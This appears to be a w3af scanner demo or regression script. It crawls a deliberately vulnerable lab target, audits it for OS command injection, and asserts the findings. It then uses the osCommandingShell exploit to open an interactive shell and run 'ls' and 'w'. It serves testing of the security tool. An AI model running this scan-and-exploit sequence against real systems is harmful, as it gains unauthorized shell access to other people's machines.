# This is the osCommanding demo:

plugins
output console,textFile
output config textFile
set fileName output-w3af.txt
set verbose True
back
output config console
set verbose False
back
back

plugins
audit osCommanding

discovery webSpider
discovery config webSpider
set onlyForward True
back
back

target
set target http://moth/w3af/audit/os_commanding/
back
start

assert len(kb.kb.getData('osCommanding','osCommanding')) == 3

exploit
exploit osCommandingShell
interact 0
ls
w
endInteraction

assert len(kb.kb.getData('osCommandingShell','shell')) == 1

exit
